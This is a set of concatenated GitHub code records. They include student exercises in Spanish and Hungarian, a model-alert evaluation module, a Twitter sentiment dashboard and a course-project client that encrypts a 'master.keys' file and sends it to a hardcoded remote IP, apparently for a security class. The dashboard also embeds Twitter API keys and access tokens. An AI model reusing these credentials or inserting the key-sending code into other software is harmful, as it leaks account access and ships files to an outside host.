0\r\n aux = lista.inicio\r\n c1 = str(clave)\r\n tam = tamanio(lista)-1\r\n while (aux is not None):\r\n n = str(aux.info.nombre)\r\n if (cont == tam-1):\r\n eliminar(lista,n,c1)\r\n cont += 1\r\n aux = aux.sig\r\n \r\n\r\nclass Personaje(object):\r\n \r\n def __init__(self,nombre,altura,edad,genero,especie,planetaNatal,episodioAparece):\r\n self.altura = altura\r\n self.nombre = nombre\r\n self.edad = edad\r\n self.genero = genero\r\n self.especie = especie\r\n self.planetaNatal = planetaNatal\r\n self.episodioAparece = episodioAparece\r\n \r\n def __str__(self):\r\n ret = \"\"\r\n for e in self.episodioAparece:\r\n ret += e\r\n return self.nombre +\" \"+ self.altura +\" \"+ self.edad +\" \"+ self.genero +\" \"+ self.especie +\" \"+ self.planetaNatal+\" \"+ret\r\n\r\nstarWars = Lista()\r\npersonaje1 = Personaje(\"Artud\",\"60\",\"801\",\"masculino\",\"Droide\",\"Industria Autonoma\",[\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\npersonaje1 = Personaje(\"Darth Vader\",\"180\",\"845\",\"masculino\",\"humano\",\"Tatooine\",[\"4\",\"5\",\"6\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\npersonaje1 = Personaje(\"Han Solo\",\"160\",\"800\",\"masculino\",\"humano\",\"Corelia\",[\"2\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\npersonaje1 = 
Personaje(\"Leia\",\"150\",\"815\",\"femenino\",\"humano\",\"Alderaan\",[\"1\"])\r\ninsertar(starWars,personaje1,\"nombre\")\r\nbarrido(starWars)\r\n'''\r\nnombre = input(\"Nombre del personaje: \")\r\nwhile (nombre != \"\"):\r\n altura = input(\"Ingrese altura: \")\r\n edad = input(\"Ingrese edad: \")\r\n genero = input(\"Ingrese genero (femenino, masculino, robot: \")\r\n especie = input(\"Ingrese Especie: \")\r\n planetaNatal = input(\"Ingrese planeta natal: \")\r\n #episodios = int(input(\"En cuantos episodios aparece: \"))\r\n #for e in range(episodios):\r\n # episodio = input(\"Numero del episodio: \")\r\n # episodioAparece += episodio\r\n episodioAparece = []\r\n episodio = input(\"Episodio donde aparece: \")\r\n while (episodio != \"\"):\r\n episodioAparece += episodio\r\n episodio = input(\"Ingrese otro episodio donde aparece: \")\r\n personaje = Personaje(nombre,altura,edad,genero,especie,planetaNatal,episodioAparece)\r\n insertar(starWars,personaje,\"nombre\")\r\n nombre = input(\"Ingrese un personaje: \")\r\nbarrido(starWars) \r\n'''\r\nprint(\"\")\r\n\r\naux = starWars.inicio\r\nmayor = aux\r\nwhile (aux is not None):\r\n if (aux.info.genero == \"femenino\"):\r\n print(\"Personaje feminino\") \r\n print(aux.info.nombre)\r\n control = False\r\n if (aux.info.especie == \"Droide\"):\r\n for e in aux.info.episodioAparece:\r\n if (int(e) < 7):\r\n control = True\r\n if (control == True):\r\n print(\"Droide encontrado en los primeros 6 episodios: \")\r\n print(aux.info)\r\n if (aux.info.nombre == \"Darth Vader\"):\r\n print(\"Vader esta en la lista : \")\r\n print(aux.info)\r\n if (aux.info.nombre == \"Han Solo\"):\r\n print(\"Informacion de Han Solo: \")\r\n print(aux.info)\r\n control2 = False\r\n for e in aux.info.episodioAparece:\r\n if (int(e)<=7):\r\n control2 = True\r\n if (control2 == True):\r\n print(\"Peronsaje que aprece en alguno de los primeros 7 episodios: \")\r\n print(aux.info)\r\n if (int(aux.info.edad) > 800):\r\n print(\"Personaje con mas de 800 anios.\",aux.info.nombre)\r\n if (int(aux.info.edad) > 800 and int(aux.info.edad) > int(mayor.info.edad)):\r\n mayor = aux\r\n if (aux.info.especie == \"humano\" and aux.info.planetaNatal == \"Alderaan\"):\r\n print(\"Humano nacido en Alderan \",aux.info.nombre)\r\n if (int(aux.info.altura) < 70):\r\n print(aux.info.nombre, \" su altura es menor de 70.\")\r\n# for e in aux.info.episodioAparece:\r\n# if (int(e) == 7 or int(e) == 5 or int(e) == 4):\r\n# nom = aux.info.nombre\r\n# eliminar(starWars,nom,\"nombre\")\r\n aux = aux.sig\r\n \r\nprint(\" \") \r\nbarrido(starWars)\r\nprint(\"MARCA\",mayor.info)\r\nprint(\" \")\r\nchu = []\r\nep = input(\"Chew aparece en el episodio: \")\r\nwhile (ep != \"\"):\r\n chu += ep\r\n ep = str(input(\"Chewy aparece en el episodio: \"))\r\n\r\npersonaje1 = Personaje(\"Chewbacca\",\"230\",\"101\",\"masculino\",\"Wookiee\",\"Kashyyyk\",chu)\r\ninsertar(starWars,personaje1,\"nombre\")\r\nbarrido(starWars)\r\nprint(\"Datos de chewbacca : \",busqueda(starWars,\"Chewbacca\",\"nombre\").info)\r\n\r\neliminar_anteultimo(starWars,\"nombre\")\r\nprint(\" \")\r\nbarrido((starWars))","repo_name":"JuanInhale/Algoritmos-2020","sub_path":"tp4 ej11.py","file_name":"tp4 ej11.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11829763418","text":"from joblib import Parallel, delayed\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import 
metrics\n\n\nplt.rcParams[\"figure.figsize\"] = (15,15)\n\ndef compute_alerts_and_performance(df, taus=np.linspace(0,1,25), return_oc_res=False, tau_on_percentile=False):\n \"\"\"\n From a dataframe of model risk estimates returns the observer level alerts and performance of various decision thresholds (taus).\n \n ***\n\n Parameters\n ----------\n df : pandas.DataFrame\n Given dataframe of risk estimates must have the following columns: ***\n \n taus: np.array, optional\n The decision thresholds being considered\n \n return_oc_res: Boolean, optional\n If the observed alert counts should be returns\n \n tau_on_percentile: Boolean, optional\n If the taus are evaluated on the percentiles of the risk estimates\n\n Returns\n -------\n ap_res : returns summaries of the observer level number of alerts and performance for each tau\n \n oc_res : returns the actual number of alerts obvserved by each observer for a given tau\n \"\"\"\n #calculate sensitivity at the population level\n #calculate alerts at the observer level\n\n observers = df['observer'].unique()\n\n res = []\n oc_res = []\n for tau in taus:\n _df = df.copy()\n if tau_on_percentile:\n _df['p'] = _df['p'].rank(pct=True)\n _df['y_hat'] = 1*(_df['p']>=tau)\n\n\n\n #population performance (confusion matrix (cm))\n _ = _df.groupby('eID').max()\n cm = {}\n tn, fp, fn, tp = metrics.confusion_matrix(_['y'], _['y_hat']).ravel()\n cm['tn'] = tn\n cm['fp'] = fp\n cm['fn'] = fn\n cm['tp'] = tp\n\n #observer alerts\n _ = _df[_df['y_hat']==1].groupby('eID').first()\n alert_counts = _['observer'].value_counts()\n oc = alert_counts.to_dict()\n oc_v = oc.values()\n oa = {'oa_max': alert_counts.max(), 'oa_min': alert_counts.min(), \n 'oa_mean': alert_counts.mean(), 'oa_med': alert_counts.median(),\n 'oa_sum': alert_counts.sum(), \n }\n\n _oc_res = [{'observer': o, 'tau': tau, 'n_alerts': oc.get(o, 0)} for o in observers]\n oc_res+=_oc_res\n\n #save tau res\n _res = {'tau': tau}\n _res.update(cm)\n _res.update(oa)\n res.append(_res)\n\n\n ap_res = pd.DataFrame(res)\n #calculate performance based on cm\n ap_res['sens'] = ap_res['tp'] / (ap_res['tp'] + ap_res['fn'])\n ap_res['spec'] = ap_res['tn'] / (ap_res['tn'] + ap_res['fp'])\n ap_res['ppv'] = ap_res['tp'] / (ap_res['tp'] + ap_res['fp'])\n ap_res['npv'] = ap_res['tn'] / (ap_res['tn'] + ap_res['fn'])\n\n ne = _df['eID'].nunique()\n ap_res['proportion_unalerted'] = (ne-ap_res['oa_sum'])/ne\n\n oc_res = pd.DataFrame(oc_res)\n \n if return_oc_res:\n return(ap_res, oc_res)\n else:\n return(ap_res)\n\n\ndef plot_alerts_and_performance(ap_res, performance_measures=['sens', 'spec']):\n fig, ax1 = plt.subplots()\n\n ax2 = ax1.twinx()\n for m in performance_measures:\n ax1.plot(ap_res['tau'], ap_res[m], label=m)\n\n\n ax2.plot(ap_res['tau'], ap_res['oa_med'], ':', color='r', label='# alerts per unit')\n ax2.fill_between(ap_res['tau'], ap_res['oa_max'], ap_res['oa_min'], color='r', alpha=0.5,)\n\n ax1.set_xlabel('Tau')\n ax1.set_ylabel('Performance')\n ax2.set_ylabel('# Observed Alerts ')\n\n ax1.legend(loc='lower left')\n ax2.legend(loc='upper right')\n\n plt.show()\n \n \n \n \n \ndef plot_trade_off(ap_res,\n alpha=np.expand_dims(np.linspace(1,0, 25), axis=1),\n cmap = plt.cm.get_cmap('viridis'),\n c1 = 'sens' , c2='proportion_unalerted' ):\n v1 = np.expand_dims(ap_res[c1].values, axis=0)\n v2 = np.expand_dims(ap_res[c2].values, axis=0)\n v = alpha*v1 + (1-alpha)*v2\n \n taus = list(ap_res['tau'])\n extent = [taus[0], taus[-1], alpha[-1,0], alpha[0,0]]\n\n plt.imshow(v, extent=extent, cmap=cmap, vmin=0, 
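# pin the color scale to [0, 1], the full range of the alpha-weighted score\n               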
vmax=1)\n plt.colorbar()\n plt.xlabel('tau')\n plt.ylabel('alpha\\nupweight {} {} upweight {}'.format(c2, ' '*40, c1))\n plt.title('alpha*{} + (1-alpha)*{}\\nin w.r.t alpha & tau'.format(c1, c2))\n plt.show()\n \n #new\n _X,_Y = np.meshgrid(taus, alpha)\n\n fig, ax = plt.subplots()\n CS = ax.contour(_X, _Y, v)\n ax.clabel(CS, CS.levels, inline=True, fontsize=10)\n fig.colorbar(CS)\n ax.set_xlabel('tau')\n ax.set_ylabel('alpha*{} + (1-alpha)*{}\\nin w.r.t alpha & tau'.format(c1, c2))\n plt.show()\n\n \ndef plot_gain(ap_res,\n alpha=np.expand_dims(np.linspace(0.1,0.3, 5), axis=1), \n kappa = 10000,\n beta = 20):\n \n #alpha: effectiveness\n #kappa: cost of CDI\n #beta: intervention cost\n \n n_intervene = np.expand_dims((ap_res['tp']+ap_res['fp']).values, axis=0)\n n_intervene_pos = np.expand_dims((ap_res['tp']).values, axis=0)\n v = alpha*kappa*n_intervene_pos - beta*n_intervene\n\n for i,_a in enumerate(alpha):\n plt.plot(list(ap_res['tau']), v[i], label='alpha={}'.format(_a[0]))\n\n plt.xlabel('tau')\n plt.ylabel('Gain')\n plt.legend()\n plt.show()\n \n \ndef plot_effectiveness(ap_res, e = np.expand_dims(np.linspace(0,1, 5), axis=1)):\n #e: effectiveness\n \n n_intervene = np.expand_dims((ap_res['tp']+ap_res['fp']).values, axis=0)\n n_intervene_pos = np.expand_dims((ap_res['tp']).values, axis=0)\n n_pos = np.expand_dims((ap_res['tp'] + ap_res['fn']).values, axis=0)\n \n v = n_pos - (e*n_intervene_pos)\n \n for i,_e in enumerate(e):\n plt.plot(n_intervene[0], v[i], label='effectiveness={}'.format(_e[0]))\n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n \n for i,_e in enumerate(e):\n plt.plot(list(ap_res['tau']), v[i], label='effectiveness={}'.format(_e[0]))\n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n \n return v\n\n\n\n######### Bootstrapped Versions ###########\ndef bs_sample(df):\n\n rng = np.random.default_rng()\n IDs = df['eID'].unique()\n _IDs = rng.choice(IDs, size=len(IDs), replace=True)\n _df = []\n for i, _ID in enumerate(_IDs):\n _df_ID = df[df['eID']==_ID].copy(deep=True)\n _df_ID['eID'] = str(i) + '_' + _df_ID['eID'].astype(str)\n _df.append(_df_ID)\n _df = pd.concat(_df)\n \n return(_df)\n\n\n\ndef _bs_rep_compute_alerts_and_performance(df, tau_on_percentile=True):\n bs_df = bs_sample(df)\n bs_ap_res, bs_oc_res = compute_alerts_and_performance(bs_df, return_oc_res=True, tau_on_percentile=tau_on_percentile)\n return(bs_ap_res, bs_oc_res)\n \n \n\ndef bs_compute_alerts_and_performance(df, tau_on_percentile=True, bs_rep=10, n_jobs=5):\n ap_res, oc_res = compute_alerts_and_performance(df, return_oc_res=True, tau_on_percentile=tau_on_percentile)\n \n bs_res = Parallel(n_jobs=n_jobs)(delayed(_bs_rep_compute_alerts_and_performance)(df) for _ in range(bs_rep))\n \n bs_ap_res = []\n bs_oc_res = []\n for i, _bs_res in enumerate(bs_res):\n _bs_res[0]['rep'] = i\n bs_ap_res.append(_bs_res[0])\n _bs_res[1]['rep'] = i\n bs_oc_res.append(_bs_res[1])\n\n bs_ap_res = pd.concat(bs_ap_res)\n bs_oc_res = pd.concat(bs_oc_res)\n \n return(ap_res, oc_res, bs_ap_res, bs_oc_res)\n\n\n\ndef bs_plot_effectiveness(ap_res, bs_ap_res, \n e = np.expand_dims(np.linspace(0,1, 5), axis=1)):\n #e: effectiveness\n n_intervene = np.expand_dims((ap_res['tp']+ap_res['fp']).values, axis=0)\n n_intervene_pos = np.expand_dims((ap_res['tp']).values, axis=0)\n n_pos = np.expand_dims((ap_res['tp'] + ap_res['fn']).values, axis=0)\n\n v = n_pos - (e*n_intervene_pos)\n\n\n _bs_ap_res = bs_ap_res.copy(deep=True)\n _bs_ap_res['n_intervene'] = 
_bs_ap_res['tp']+bs_ap_res['fp']\n _bs_ap_res['n_intervene_pos'] = _bs_ap_res['tp']\n _bs_ap_res['n_pos'] = _bs_ap_res['tp'] + _bs_ap_res['fn']\n\n\n for i,_e in enumerate(e):\n #plt.plot(n_intervene[0], v[i], label='effectiveness={}'.format(_e[0]))\n\n x = n_intervene[0]\n y = v[i]\n\n _bs_ap_res['v'] = _bs_ap_res['n_pos'] - _e*_bs_ap_res['n_intervene_pos']\n _ = _bs_ap_res.groupby(by=['tau'])[['n_intervene', 'v']].describe(percentiles=[0.025, 0.25, 0.5, 0.75, 0.975])\n x_lb = _[('n_intervene', '2.5%')]\n x_ub = _[('n_intervene', '97.5%')]\n xerr = [x-x_lb, x_ub-x]\n\n y_lb = _[('v', '2.5%')]\n y_ub = _[('v', '97.5%')]\n yerr = [y-y_lb, y_ub-y]\n\n plt.errorbar(x, y, xerr=xerr, yerr=yerr, \n label='effectiveness={}'.format(_e[0]))\n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n\n for i,_e in enumerate(e):\n #plt.plot(list(ap_res['tau']), v[i], label='effectiveness={}'.format(_e[0]))\n \n x = list(ap_res['tau'])\n y = v[i]\n\n _bs_ap_res['v'] = _bs_ap_res['n_pos'] - _e*_bs_ap_res['n_intervene_pos']\n _ = _bs_ap_res.groupby(by=['tau'])[['n_intervene', 'v']].describe(percentiles=[0.025, 0.25, 0.5, 0.75, 0.975])\n\n y_lb = _[('v', '2.5%')]\n y_ub = _[('v', '97.5%')]\n yerr = [y-y_lb, y_ub-y]\n\n plt.errorbar(x, y, yerr=yerr, \n label='effectiveness={}'.format(_e[0]))\n \n\n plt.ylabel('n CDI+')\n plt.xlabel('n intervene')\n plt.legend()\n plt.show()\n\n\n\n\n\n\n","repo_name":"eotles/model_alerting_and_performance_evaluation","sub_path":"model_alerting_and_performance_evaluation.py","file_name":"model_alerting_and_performance_evaluation.py","file_ext":"py","file_size_in_byte":9446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71494388995","text":"import socket\nimport pickle\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives.serialization import Encoding, PublicFormat\n\nHOST = \"172.174.106.14\"\nPORT = 10100\n\ndef __init_connection() -> rsa.RSAPublicKey:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.send(b\"INIT\")\n public_key = pickle.loads(s.recv(2048))\n\n return public_key\n \n\ndef __send_filename(filename: str) -> None:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n try:\n s.connect((HOST, PORT))\n s.send(b\"FNAM\")\n ack = s.recv(4)\n if ack == b\"ACK\":\n s.send(filename.encode())\n except:\n return\n \n\ndef __send_file(filename: str, public_key: rsa.RSAPublicKey) -> None:\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n with open(filename, 'rb') as file:\n for line in file:\n ciphertext = public_key.encrypt(\n line,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n s.send(pickle.dumps(ciphertext))\n while True:\n ack = s.recv(4)\n if ack == b\"ACK\":\n break\n s.send(b\"END\")\n except Exception as e:\n print(e)\n\n\ndef __send_master_key(filename: str, public_key: rsa.RSAPublicKey) -> None:\n file = f\"{filename}-master.keys\"\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.send(b\"MKEY\")\n ack = s.recv(4)\n if ack == b\"ACK\":\n __send_file(file, public_key)\n\n\ndef send_master_key(filename: str) -> None:\n public_key = __init_connection()\n\n __send_filename(filename)\n\n __send_master_key(filename, 
public_key)","repo_name":"vadrif-draco/CSE451-CompAndNetSec-Project","sub_path":"client_server_comm/client_server.py","file_name":"client_server.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30240790667","text":"import renszarvas\n\nlista=[]\n\ndef beolvas():\n #fájl elérése\n beFajlom=open(\"fileok/Mikulasszan.txt\",\"r\",encoding=\"utf-8\")\n #első sor eldobása\n beFajlom.readline()\n #többi sor\n adatok=beFajlom.readlines()\n #print(adatok)\n #beolvasott sorok feldolgozása\n for sor in adatok:\n #sorvégejelektől megtisztítom\n sor=sor.strip()\n #eldarabolom\n darabolt=sor.split(\"@\")\n #print(darabolt)\n #példányosítás\n szarvas=renszarvas.Renszarvaas(darabolt[0],darabolt[1],darabolt[2],darabolt[3])\n #print(szarvas)\n #listába fűzöm az objektumokat.\n lista.append(szarvas)\n\ndef kiir():\n #utasok kiírása\n for szarvas in lista:\n print(szarvas)\n\n\ndef mikulas():\n print(\n\"\"\"\n\\tA feladathoz az adatokat a Mikulassszan.txt állományban találod. Ez egy rövid nyilvántartás, arról, hogy ki utazik a szánon.\n\\t1.\tOlvasd be a mikulás rénszarvasainak adatait! \n\\ta.\tÍrd ki a nevüket és a magasságukat.\n\\tb.\tHány rénszarvasa van a mikulásnak?\n c.\tÍrd ki Pompás idegen nyelvű megfelelőjét!\n d.\tA rénszarvas leírásokban hányszor fordul elő a Mikulás szó?\n e.\tÁtlagosa milyen magasak a rénszarvasok?\n f.\tÍrd ki a páros helyen repülő szarvasok magyar nevét!\n g.\tHányadik rénszarvasnak a leghosszabb a kiírása? (Kinek a leírása áll a legtöbb karakterből?)\n h.\tKi repül a legkisebb sorszámú helyen?\n\n \"\"\"\n )\n\n #szarvas1=renszarvas.Renszarvaas(\"Comet – Üstökös\",\"140\",\"2\",\"A Blorouis üstökös után kapta a nevét. Abban az időben ez vezette a csapatot a sötét és ködös éjszakán. Már az iskolában is kitűnő tanuló volt, a Mikulás igazi támaszának számított. Néha nagyon makacs, de erős. 
Különleges vezetői képességekkel rendelkezik, mindig a problémára összpontosít.\")\n #print(szarvas1)\n beolvas()\n kiir()","repo_name":"Laci202/urlap","sub_path":"0110OraiMunka/feladat7.py","file_name":"feladat7.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70990300994","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 1 13:41:53 2021\n\n@author: shashwat\n\"\"\"\n\n\nimport streamlit as st\nimport nltk \nimport numpy as np\nfrom textblob import TextBlob\nimport os \nimport matplotlib.pyplot as plt\nimport re\nfrom nltk.classify import SklearnClassifier\nfrom nltk.classify import ClassifierI\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport pandas as pd\nimport pickle\nimport tweepy\nimport plotly.express as px\nimport wordcloud\nfrom wordcloud import STOPWORDS\nfrom wordcloud import WordCloud\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\n\ndef cleanTxt(text):\n text = re.sub('@[A-Za-z0–9]+', '', text) \n text = re.sub('#', '', text) \n text = re.sub('RT[\\s]+', '', text)\n text = re.sub('https?:\\/\\/\\S+', '', text) \n return text\n\n\ndef tw_sentiment(tweet):\n with open('naivebayes.pickle', 'rb') as f:\n clf = pickle.load(f)\n tweet_features = find_features(tweet)\n d = clf.prob_classify(tweet_features)\n if d.prob(\"neg\") > 0.9:\n return \"neg \"\n elif d.prob(\"pos\") > 0.6:\n return \"pos\"\n return \"neutral\" \n\n\ndef find_features(document):\n all_words = np.load(\"allwords.npy\")\n words = word_tokenize(document)\n features = {}\n for w in all_words:\n features[w] = (w in words)\n return features\n\n\ndef make_wordcloud(lst):\n lst = [item.lower() for item in lst]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show()\n a1, a2, a3 = st.beta_columns((2,1,1))\n a1.pyplot()\n\n\ndef nam_adj(df):\n names, adjectives, nouns, adverbs = [],[],[],[]\n for twt in df[\"Tweet\"]:\n words = word_tokenize(twt)\n pairs = nltk.pos_tag(words)\n for pair in pairs:\n if pair[1] == \"NNP\":\n names.append(pair[0])\n elif pair[1] == \"JJ\" or pair[1] ==\"JJS\" or pair[1] == \"JJR\" :\n adjectives.append(pair[0])\n elif pair[1] == \"NN\" or pair[1] == \"NNS\":\n nouns.append(pair[0])\n elif pair[1] == \"RB\" or pair[1] == \"RBR\" or pair[1] == \"RBS\":\n adverbs.append(pair[0])\n return names,adjectives,nouns,adverbs\n\n\n\n\n\ndef make_wordcloud_df(df): \n words = []\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\", \"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n for twt in df.Tweet:\n tokens = twt.split()\n\n for i in range(len(tokens)):\n tokens[i] = tokens[i].lower()\n words.append(tokens[i])\n \n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(words))\n plt.figure(figsize = (8, 8), 
facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show()\n a1, a2, a3 = st.beta_columns((2,1,1))\n a1.subheader(\"General word cloud\")\n a1.pyplot()\n\ndef getSubjectivity(text):\n return TextBlob(text).sentiment.subjectivity\n\n\ndef sentiment_textblob(text):\n if TextBlob(text).sentiment.polarity > 0:\n return \"pos\"\n elif TextBlob(text).sentiment.polarity < 0:\n return \"neg\"\n return \"neutral\"\n\ndef user_tweets(username, tweets):\n consumer_key = 'j5z6oTkkODllydAv4TJa8FxJS'\n consumer_secret = 'rSig6RvaLe2v8GzrsNsFpirLF2OKVxKune1NqXMuY8JV42RmKv'\n access_token = '1010014270845698050-rNQS8lrmTbzgMWpNI1khQA3xUSNMEK'\n access_token_secret = 'n4Jql8f1ao1McHKg5FQHQxTq1vV9ykcPI9hXBIp0CQKFn'\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n tweets = api.user_timeline(username, count=tweets, tweet_mode='extended')\n df = pd.DataFrame([tweet.full_text for tweet in tweets], columns=['Tweet'])\n df[\"Tweet\"] = df[\"Tweet\"].apply(cleanTxt)\n return df\n\n\ndef user_data(user, tweets):\n df = user_tweets(user, int(tweets))\n #st.write(df)\n df['Sentiment'] = df['Tweet'].apply(sentiment_textblob)\n df['Subjectivity'] = df['Tweet'].apply(getSubjectivity)\n st.subheader(\"Tweets\")\n st.write(df)\n \n df1 = df.groupby('Sentiment').count()\n sub_mean = df[\"Subjectivity\"].mean()\n \n \n #st.write(df1.loc(0)[\"pos\"]['Tweet'])\n #st.write(df1.loc(0)[\"neg\"]['Tweet'])\n #st.write(df1.loc(0)[\"neutral\"]['Tweet'])\n try:\n pos = df1.loc(0)[\"pos\"][\"Tweet\"]\n except:\n pos = 0\n try:\n neg = df1.loc(0)[\"neg\"][\"Tweet\"]\n except:\n neg = 0\n try:\n neutral = df1.loc(0)[\"neutral\"][\"Tweet\"]\n except:\n neutral = 0\n s1,s2,s3 = st.beta_columns((1,1,1))\n s1.success(\"pos: {}\".format(pos))\n s2.error(\"neg: {}\".format(neg))\n s3.info(\"neutral: {}\".format(neutral))\n # y = np.array([pos,neg,neutral])\n \n # labels = [\"pos\",\"neg\",\"neutral\"]\n # st.header(\"Percentage of tweets \")\n # fig = px.pie(values = y, names = labels)\n # st.plotly_chart(fig)\n #make_wordcloud_df(df)\n names, adjectives, nouns, adverbs = nam_adj(df)\n a1, a2, a3 = st.beta_columns((2,1,2))\n a1.subheader(\"Names talked about : \")\n #make_wordcloud(names)\n lst = [item.lower() for item in names]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a1.pyplot()\n a3.subheader(\"Things talked about : \")\n #make_wordcloud(nouns)\n lst = [item.lower() for item in nouns]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a3.pyplot()\n \n \n \ndef user_data_naive(user, tweets):\n df = user_tweets(user, int(tweets))\n #st.write(df)\n 
df['Sentiment'] = df['Tweet'].apply(tw_sentiment)\n #df['Subjectivity'] = df['Tweet'].apply(getSubjectivity)\n st.subheader(\"Tweets\")\n st.write(df)\n df1 = df.groupby('Sentiment').count()\n #sub_mean = df[\"Subjectivity\"].mean()\n #st.write(\"Factuality percentage : {} \".format((1-sub_mean)*100))\n #st.write(df1.loc(0)[\"pos\"]['Tweet'])\n #st.write(df1.loc(0)[\"neg\"]['Tweet'])\n #st.write(df1.loc(0)[\"neutral\"]['Tweet'])\n try:\n pos = df1.loc(0)[\"pos\"][\"Tweet\"]\n except:\n pos = 0\n try:\n neg = df1.loc(0)[\"neg\"][\"Tweet\"]\n except:\n neg = 0\n try:\n neutral = df1.loc(0)[\"neutral\"][\"Tweet\"]\n except:\n neutral = 0\n s1,s2,s3 = st.beta_columns((1,1,1))\n s1.success(\"pos: {}\".format(pos))\n s2.error(\"neg: {}\".format(neg))\n s3.info(\"neutral: {}\".format(neutral))\n y = np.array([pos,neg,neutral])\n \n # labels = [\"pos\",\"neg\",\"neutral\"]\n # st.header(\"Percentage of tweets \")\n # fig = px.pie(values = y, names = labels)\n # st.plotly_chart(fig)\n #make_wordcloud_df(df)\n names, adjectives, nouns, adverbs = nam_adj(df)\n a1, a2, a3 = st.beta_columns((2,1,2))\n a1.subheader(\"Names talked about : \")\n #make_wordcloud(names)\n lst = [item.lower() for item in names]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a1.pyplot()\n a3.subheader(\"Things talked about : \")\n #make_wordcloud(nouns)\n lst = [item.lower() for item in nouns]\n new_stopwords = {\"today\", \"watch\", \"people\", \"amp\", \"time\", \"day\", \"week\", \"people\",\"year\",\"S\"}\n stopwords = set(STOPWORDS)\n stopwords = stopwords.union(new_stopwords)\n wordcloud = WordCloud(width = 800, height = 800,\n background_color ='black',\n stopwords = stopwords,\n min_font_size = 10).generate(\" \".join(lst))\n plt.figure(figsize = (8, 8), facecolor = None)\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad = 0)\n plt.show() \n a3.pyplot()\n \ndef live_stream(word, number_of_tweets):\n #consumer key, consumer secret, access token, access secret.\n ckey=\"43Py8H7TanGk8MsQa4OQrPkXh\"\n csecret=\"f34JoWamtLjpCqwbqxm6Ml5tDDMoyb432rkLycqH3ot3sfLHVK\"\n atoken=\"1010014270845698050-bo929URvOonltIawK5m9EiOBXDFQyW\"\n asecret=\"vWP0kHUJlqrUwRtJMH32QGcwTVcHlBingfmkJfrzFzPgH\"\n\n\n class listener(StreamListener):\n def __init__(self, num_tweets_to_grab):\n self.counter = 0\n self.num_tweets_to_grab = num_tweets_to_grab\n self.lst = []\n \n\n\n def on_data(self, data):\n 